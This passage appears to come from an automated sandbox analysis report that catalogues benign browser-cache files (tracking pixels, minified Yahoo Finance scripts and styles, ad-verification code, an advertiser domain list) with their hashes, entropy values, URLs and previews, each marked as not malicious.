                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://rtb.openx.net/sync/dds?ox_sc=1&ox_init=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5101)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.392376854148404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:RmaWcrFSbzNHhwcsmEAmPVHz6TYQAkH9Y0ykfLqEi1sgt4183opCssW8InxHcjzw:RHS0cXlmPVHzkAkHK0ykfLqEi1TCe3o9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9FE3E4BF3E69116D4C00FF7306967286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21D61F9622B7E12936CEA42808EE16DA9BCD5997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E535362E9C389033FAF37A56795D0C2F8235D8E8F18D7E8A98B8F58F7F9CA1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E6D94542817EB87F7C46B0C1C6172EF0E5BE0BEC832BED754FADC639C305AEDF217C8A1ABEC0099DEA60ED158E279E38A164655900C2F77F7A39AAFD0B9E489D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/GradientScale.EwYudrQa.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as N,e as p,d,f as y,i as m,q as u,U as v,k as S,n as M,x as D,b as k,t as R,j as w,h as W,l as g,m as z}from"./scheduler.Dr9AAxFe.js";import{e as C}from"./each.BExQfwb4.js";import{S as H,i as j}from"./index.DCSmZEjO.js";import{N as F,t as x}from"./commonUtil.CI22_Irn.js";function E(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s,e=t.reduce((_,h)=>_+h.area,0),i=r?e/r:0,o=a?e/a:0;let c=n,f=l;return t.map(_=>{const h=_;return h.coordinates={x:c,y:f},a>=r?(h.width=i,h.height=h.area/i,f=f+h.area/i):(h.width=h.area/o,h.height=o,c=c+h.area/o),h})}function G(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s;let e;const i=t.reduce((o,c)=>o+c.area,0);if(a>=r){const o=i/r,c=a-o;e={height:r,shortestEdge:Math.min(r,c),width:c,xOffset:n+o,yOffset:l}}else{const o=i/a,c=r-o;e={height:c,shortestEdge:Math.min(c,a),width:a,xOffset:n,yOffset:l+o}}return e}function V(s,t,a){const{sortField:r=""}=s;if(!r)return[];const n=s.rows.reduce((e,i)=>{var o;return e+parseFloat(((o=i[r])==null?void 0:o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (758)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):759
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.001874279681004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:APPMAOBEyhvEGe/qgAROvgC8VL2GejV3qdUi4RV3CAquwF0ODz44qutR9yPzP3:AMHv3ROvcV6owjSAqbRY4qutR9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E1DF39E1794E282A906CAFB0751BAED8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0935FD18EA52DD1614A5576386977C62B45ECEE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:04A7B23588DC426FF2A1B8A54BF2E67EE66FF7893C9B0A42627031D6E35FFF5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:536F7BD166C3957D2D5321D13A5C94417B7AF42155CD803AA601D9A5C7A674C5360BAC4EACDB3653EDDB8832E121A4287B22A7C7ECD77308FC33E17266FAB18E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/StoryStream.rnZSA-x3.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.native-ad.yf-oz7lmn:not(:has(>*)){min-height:var(--placeholder-height)}.loader-container.yf-18xzkq9{width:100%;display:flex;justify-content:center;gap:var(--space-4)}.loader-content.yf-18xzkq9{width:100%;display:flex;flex-direction:column;align-items:flex-start;justify-content:center;margin-bottom:var(--space-4);gap:var(--space-1)}.stream-items.yf-1usaaz9{width:100%}.stream-item.yf-1usaaz9{padding-top:var(--space-5);padding-bottom:var(--space-5);border-bottom:var(--border-light)}.stream-item.yf-1usaaz9:last-child{padding-bottom:unset;border-bottom:none}.display-ad.yf-1usaaz9:has(>.hidden),.display-ad.yf-1usaaz9:has(>[style*="display: none"]),.display-ad.yf-1usaaz9:not(:has(>*)){display:contents}.native-ad.yf-1usaaz9:not(:has(>*)){display:contents}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (603)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):53604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.277163567936069
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:dYnlkqFdcNQRwTysqq4d4Y1IgnxiTP8N//oLnTuE:dYnlJEQRwTysqdIgnxwTuE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92166C0FA3F566B2BA676C4A2E2488D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FCDB4BD94F287F41F950100E0670192D111D00C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:172082724384A06E30A97760835A1723F14AC31B6B5CECB4A5AC82B1DEAE121A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F71793105197FEB7CA5FC0058914851C7DA0288150221B9FE709069E7D142D03B964E32CFFB0681AD14604A64212890E880AED6C2A84832AD8303DDCD7C753E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/draco/versioned/decoders/1.3.6/draco_wasm_wrapper.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.arrayIteratorImpl=function(f){var m=0;return function(){return m<f.length?{done:!1,value:f[m++]}:{done:!0}}};$jscomp.arrayIterator=function(f){return{next:$jscomp.arrayIteratorImpl(f)}};$jscomp.makeIterator=function(f){var m="undefined"!=typeof Symbol&&Symbol.iterator&&f[Symbol.iterator];return m?m.call(f):$jscomp.arrayIterator(f)};.$jscomp.getGlobal=function(f){return"undefined"!=typeof window&&window===f?f:"undefined"!=typeof global&&null!=global?global:f};$jscomp.global=$jscomp.getGlobal(this);$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_NATIVE_MAP=!1;$jscomp.ASSUME_NO_NATIVE_SET=!1;$jscomp.SIMPLE_FROUND_POLYFILL=!1;$jscomp.defineProperty=$jscomp.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(f,m,v){f!=Array.prototype&&f!=Object.prototype&&(f[m]=v.value)};.$jscomp.polyfill=function(f,m,v,t){if(m){v=$jscomp.global;f=f.split(".");for(t=0;t<f.length-1;t++){var h=f[t];h in v||(v[h]={});v=v[h]}f=f[f.length
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1068), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.491415734468382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2jYTXJpuadP1GYcT1nGHRTMQ1QX0q/Fyx3yVAuNLjNY:2juzt+ThGm8Qkuyx3+3NLW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8D22430FF4ECFD3DD1D20DBED5437E23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BB8FCC0D0CAC4D91089CFE374040A2A1D7CC7920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5FE3AD63C453AF97286155323275367B409344D6D972664741C5617A24426880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:57135EDE01156E1AA1D1FE568750E35B9E5A20582A0F3461269C7DDBD5BA62607D094888B30331A62A1A6839EAB6E17D83D8D1D52A70C4AEAFFD39692139E2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:try{var dv_win = window._dv_win || window.parent._dv_win; dv_win['dvCallback_1728414886860362']($dv,window,'6e4858a9698c468eba7e89f155268837','tpsc-ew1.doubleverify.com',{"ce":{"ddt":1,"dt":1}});}catch(e){try{var image=window.document.createElement('img');image.src=('https://tps.doubleverify.com/visit.jpg'||(window.location.protocol+'//tps30.doubleverify.com/visit.jpg'))+'?ctx=818052&cmp=1619415&dvtagver=6.1.src&dvp_cbError='+encodeURIComponent(e.message)}catch(e){}}var dvObj=$dv;var impId='6e4858a9698c468eba7e89f155268837';var dup='';dvObj.pubSub.subscribe('ImpressionServed',impId,'ResearchIPv6FromAkamai',function(){ var tagObj = dvObj.tags[impId]; var serverName = tagObj['ServerPublicDns'].substr(0, tagObj['ServerPublicDns'].indexOf('.')); var tpsServerUrl = 'https://cdn.doubleverify.com/redirect/?host=' + serverName + '&param=akipv6&impid=' + impId + '&dup=' + dup + '&eoid=1000'; dvObj.domUtilities.addImage(tpsServerUrl, null, true);});try{$dv.pubSub.publish('ImpressionServe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1016)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0715765358058125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:oR1sjwHFEUwoL6yhc3XGvRqKQTZebCv531ABakHFsn+UHxvLk6L:csma66dMQK6ZebMFwJs++Tkq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F03C9FBB907E22FAF0E7BD4BE205BE49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49DE683474BCA65C6939DE1FC3156CE161A02D31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A71BE7522F3340EF4861F7E219F28C3C27E93691931833DA985FF68A6E8A2A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B229E8F24B52C2910DEDFA330E3320DE8FC5737006D7A4159DF1A414F8F3E8714754C4DFB1612FCE14E085B92551D001D5E3975B085090788E7D8402BDDE69C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function m(e,t){if(!t)return"";const n=1e3,o=60*n,s=o*60,c=s*24,l=c*31,u=l*12,a=Date.parse(t)-Date.now();let i="year",r=Math.ceil(a/u);const f=Math.abs(a);return f<o?(i="second",r=Math.ceil(a/n)):f<s?(i="minute",r=Math.ceil(a/o)):f<c?(i="hour",r=Math.ceil(a/s)):f<l?(i="day",r=Math.ceil(a/c)):f<u&&(i="month",r=Math.ceil(a/l)),e.format(r,i)}function D(e="en-US",t={}){const n=new Intl.RelativeTimeFormat(e,{numeric:"auto",style:"long",...t});return function(s){return m(n,s)}}function T(e,t="en-US",n={}){return D(t,n)(e)}function h(e){const t=new Date,n=new Date(e);return!(t.getDate()===n.getDate()&&t.getMonth()===n.getMonth()&&t.getFullYear()===n.getFullYear())}function M(){const e=new Date,t=g(e)?-4:-5;e.setHours(0,0,0,0);const n=e.getTime()+e.getTimezoneOffset()*6e4;return new Date(n+t*36e5).getTime()}function g(e){const t=new Date(e.getFullYear(),0,1).getTimezoneOffset(),n=new Date(e.getFullYear(),6,1).getTimezoneOffset();return Math.max(t,n)!==e.getTimezoneOffset()}export{M as a,T as f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.160788788880504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:DbMYCbBB4pEx9PgdVTrC7MQ+iIo2EBOCoSMgaQMEleYNiLyizRhH2Fv/H+9f2CSW:XMbbBB4pEx9Pgq7MQ+iIo2EBOCoSMgaV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:174BEC9893E8788E1B234F6A8D203F98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F23EB0B803F4957C88E584D35EE9A15846A70A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EC853A5FBF4DB41603FE4799D6622381F393B487C128FE828AA63AE3AFE410E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EB01CB0F43D7878C16A87D1D56BB7889985BDB06F6D060B5AC883950851469B71FBCE03846ABF9B5CD329AA6C4F91871137F1C344FAB9D2588636EDAC9A9EAFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1296)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.100296535724574
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:l/Atv1aAUC0bAKR3QW4JKRFO7reMn5ChqQp5QLc2qQssDiHnbXAXUFGc2qQpsDt8:tAtb43RgPJKlMIqQnd2qQRDiHnzp12qa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7D08A752DCCA92FCE46070623335F322
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:602F24F1965EB769DE919AC4C4E75C2B17F46E31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B202C3B6DE7002188905C4417E0FAB72239B93E2AF1354DC4845756F4C73969B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:23668183D473FDAAF64F7E7F7836C42AD78A7F496DF934889226BA7540E910866CDB0B558EAD0C25BDD8E1F60914FE29EB1A748C4766BD31A581FE1546E06D14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadPredefinedListDetail.CYCLrdaP.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{f as q,l as w}from"./logUtil.hOue7iAU.js";import{d as b}from"./commonUtil.CI22_Irn.js";async function A(t,{scrId:e,formatted:f=!0,count:r=5,fields:a,start:d=0,sortType:l="",sortField:p="",isPremium:g=!1,silent:i=!1,reuse:h=!0,perfLabel:P="loadPredefinedListDetail"}){if(!e)return Promise.reject(new Error("Bad request for loadPredefinedListDetail: Missing sreener ids"));const[o]=await b(["screener"],t),s=o.getScreenerDetails(e,r);if(h&&(s==null?void 0:s.length)>=r)return s.slice(0,r);try{const n=await q(t,{key:"financeProd",pathname:g?"/v1/finance/premium/screener/predefined/saved":"/v1/finance/screener/predefined/saved",perfLabel:P,query:{count:r,formatted:f,scrIds:e,sortField:p,sortType:l,start:d,...a!=null&&a.length?{fields:a.join(",")}:{}}}),{result:D,error:c}=n.finance;if(c){const m=new Error(c.message??c);return w(t,{count:r,fields:a,formatted:f,isPremium:g,reuse:h,scrId:e,silent:i,sortField:p,sortType:l,start:d},{data:m,perfLabel:"loadPredefinedList"}),o.setError(c),null}co
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):21524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.990902235733638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:iOSyjyev9tuTXXWYkqvmp5/7B1qOWepcsiiq5+YTg8KLZOApyI3k1QoTeJxBysb:tf3v9tWXAmmjWOjpMist4dzVkeBdb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5E489637543881FCB027410794EB1483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0CD82D8FC32B3E20FB2889262054B1D644172313
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7E4CDA3D4D2AAD8A44A1ABC96297CBFEB6AF6D70B1A28DA775D18924BCF90DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:60A8D25DF919E1914801041D7CD77C74CB03F2A1ABC7FFA88ECD29B44EFA1E543C5FFE36A76F25AF820BDDC523DCCC7CE74AD6BF906C5E2F5BBCCAE992958714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/PpsenWo6Y0lPNzxwf.B21w--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/billboard_547/b0d8c85d9f4a0d173b86d5606d37a033.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.T..WEBPVP8 .T...n...*....>y4.G..$.,..p...fnH...b]...eW']8.._.?w?...qo^...w..._.}.x...>................1.....#..............s.p..?........7.+.o...?D.7O.......?.~..\.....O.<7.w._..x.......?Q...=K=...q...V...G._.?.w...~......Q.....t/....&h[.h.j..z.?...#....J.(*.i.W^e.,.^...a.&.9-fp...pC...$....Y.kxN$y...;c...<..$G:.......:w...9tY......O........{f.."....Q.]....kV...7a.H.....~.r.$..#.`..6.......:..f....A......,..7y/Z...w.=Y.08C..[;....:..&.F.:85O@......i..v.0 .........=.v}..e....<.-.uYY...."..:{....+DV..d.I#.GxC.b.k...a.u.+|.e.pM.c..m.......`.M! 4$D...(.}..q]..U]._...5....."*...e;..:...@.h...4N..8#. ...7....z........s5..Q.5..5-.{?..Q...04.......YK}F.....D2...o".n.=..._.b../.....SL.]"..i.x}.=(9.'...5..5+.S..<..n..&.5.....^.<.vz.\?t..-..5..klu.....i.;.C.wz..I..........:...H...[.8.i..:..o.* .W~.u....-..s..^.k..v2.2.W....<.P...~5.OMYr".....>.i...T...;...Z..1.. ..F}..............3...)...L.,]H...zC....v...8.[.8..N.1v[Y...}......b...I....f...(......8_.95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7213)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214208203980227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:ZKgIGQGIZVUhgGy8H72At6G+JsX/D9qYLYsGZKUG:xIrDV+xZ2AtewxLkNu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DADA04F94A4FC4D19AC57A29F0BEAB05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ABBC9E83436AEC35D71F4CAE162B49F31821E135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A9C978CE0E816FE6148ABDC5B90980B165BE9E12E49F068A2504291901C229DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A015C1EBAA29F1F12E00E7AF72D92D65C14DFF3EC618AF100BF0B651B8FA0A61B05C25611D343E6AB7ACC8DCDF58E7D6A8E14884BDC7D2E3AEE723E6FF80B5AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cx/pv/perf-vitals_3.3.0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e,t=-1,n=function(e){addEventListener("pageshow",(function(n){n.persisted&&(t=n.timeStamp,e(n))}),!0)},r=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},i=function(){var e=r();return e&&e.activationStart||0},a=function(e,n){var a=r(),o="navigate";return t>=0?o="back-forward-cache":a&&(document.prerendering||i()>0?o="prerender":document.wasDiscarded?o="restore":a.type&&(o=a.type.replace(/_/g,"-"))),{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:o}},o=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},c=function(e,t,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (4357)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4358
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.374637101746526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
